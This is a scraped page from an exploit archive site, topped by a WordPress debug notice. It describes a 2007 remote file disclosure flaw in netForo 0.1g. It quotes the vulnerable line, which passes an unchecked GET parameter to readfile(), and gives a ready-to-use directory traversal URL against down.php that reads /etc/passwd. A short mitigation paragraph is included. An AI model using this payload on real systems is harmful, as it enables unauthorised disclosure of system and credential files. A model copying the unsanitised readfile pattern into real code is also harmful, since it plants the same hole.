Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
netForo 0.1g(file_to_download)Remote File Disclosure Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
netForo
by:
GloD_M = [Mahmood_ali]
N/A
CVSS
N/A
Remote File Disclosure
CWE
Product Name: netForo
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

netForo 0.1g(file_to_download)Remote File Disclosure Exploit

This exploit allows an attacker to disclose files on the target system by exploiting the netForo 0.1g vulnerability. By manipulating the 'file_to_download' parameter in the 'down.php' script, an attacker can traverse the file system and access sensitive files such as the '/etc/passwd' file.

Mitigation:

It is recommended to update netForo to the latest version or apply any available patches to fix this vulnerability. Additionally, restrict access to the 'down.php' script or implement proper input validation to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# netForo 0.1g(file_to_download)Remote File Disclosure Exploit
# D.Script: http://sourceforge.net/projects/netforo/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile($_GET['file_to_download']);
# Exploit:[Path_netForo]/down.php?file_to_download=../../../../etc/passwd

# milw0rm.com [2007-03-08]